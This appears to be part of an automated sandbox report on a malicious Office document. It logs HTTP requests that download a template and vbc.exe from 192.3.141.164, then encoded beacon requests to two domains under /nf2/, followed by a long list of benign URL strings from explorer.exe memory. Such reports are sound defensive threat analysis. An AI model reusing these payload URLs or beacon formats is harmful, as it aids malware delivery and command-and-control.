            Source: global trafficHTTP traffic detected: GET /oti/o.dot HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 192.3.141.164Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /oti/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.164Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /nf2/?3f=yN98b8Y8Z6WLDXm&2dD=tY9gjdf+e0hI0IQM1PZNybK1EoaTSj9tXYNl6mrH9NUWEbudMWFuSJgZaQwKiXXMis7UDA== HTTP/1.1Host: www.loundxgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /nf2/?2dD=YwAVTFHcJ3tZ7puGaNBEVYFOXylMSmgTpe329QapfLZNS+2gp2G7sp/TZUhMZxkhnyNZKA==&3f=yN98b8Y8Z6WLDXm HTTP/1.1Host: www.grandcanyonbean.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
            Source: explorer.exe, 00000007.00000000.2194004284.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: unknownDNS traffic detected: queries for: xy2.eu
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Fri, 11 Jun 2021 14:00:57 GMTContent-Type: text/htmlContent-Length: 169Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
            Source: explorer.exe, 00000007.00000000.2210682045.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
            Source: oti on 192.3.141.164.url.0.drString found in binary or memory: http://192.3.141.164/oti/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210682045.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
            Source: explorer.exe, 00000007.00000000.2196107668.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
            Source: explorer.exe, 00000007.00000000.2194004284.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
            Source: explorer.exe, 00000007.00000000.2194004284.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
            Source: explorer.exe, 00000007.00000000.2194228634.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: explorer.exe, 00000007.00000000.2194228634.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
            Source: explorer.exe, 00000007.00000000.2213864870.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: vbc.exe, 00000005.00000002.2184986711.0000000002231000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 00000007.00000000.2196684735.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 00000007.00000000.2194228634.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 00000007.00000000.2206072148.0000000008471000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
            Source: explorer.exe, 00000007.00000000.2213126669.00000000002BB000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: explorer.exe, 00000007.00000000.2193837083.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico.
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210682045.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
